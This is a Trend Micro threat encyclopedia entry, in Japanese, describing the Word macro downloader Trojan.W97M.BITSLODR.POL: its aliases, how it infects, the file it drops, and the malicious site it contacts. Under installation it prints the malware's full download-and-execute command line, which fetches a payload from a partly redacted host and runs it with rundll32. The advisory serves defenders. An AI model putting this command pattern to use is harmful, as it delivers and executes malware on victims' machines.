![Trend Micro Security](https://www.trendmicro.com/content/dam/trendmicro/global/en/global/logo/logo-desktop.png)
Trojan.W97M.BITSLODR.POL
2020年3月17日
別名:
TrojanDownloader:O97M/Powdow.ARJ!MTB (Microsoft); VBA/TrojanDownloader.Agent.RZD trojan (NOD32)
プラットフォーム:
Windows
危険度:
ダメージ度:
感染力:
感染確認数:
情報漏えい:
![](/vinfo/imgFiles/JPlegend.jpg)
- マルウェアタイプ: トロイの木馬型
- 破壊活動の有無: なし
- 暗号化:
- 感染報告の有無: はい
概要
マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
ただし、情報公開日現在、このWebサイトにはアクセスできません。
詳細
ファイルサイズ 93,441 bytes
メモリ常駐 なし
発見日 2020年3月13日
侵入方法
マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
インストール
マルウェアは、以下のファイルを作成します。
- %Temp%\curl.com
マルウェアは、以下のプロセスを追加します。
- "%System%\cmd.exe" /c %Temp%\curl.com /transfer jobname http://{BLOCKED}tdriold.com/f64bj/jtrhs.php?l=ghs3.cab %Temp%\12345.dll&& rundll32 %Temp%\12345.dll,DllRegisterServer
その他
マルウェアは、以下の不正なWebサイトにアクセスします。
- http://{BLOCKED}tdriold.com/f64bj/jtrhs.php?l=ghs3.cab
ただし、情報公開日現在、このWebサイトにはアクセスできません。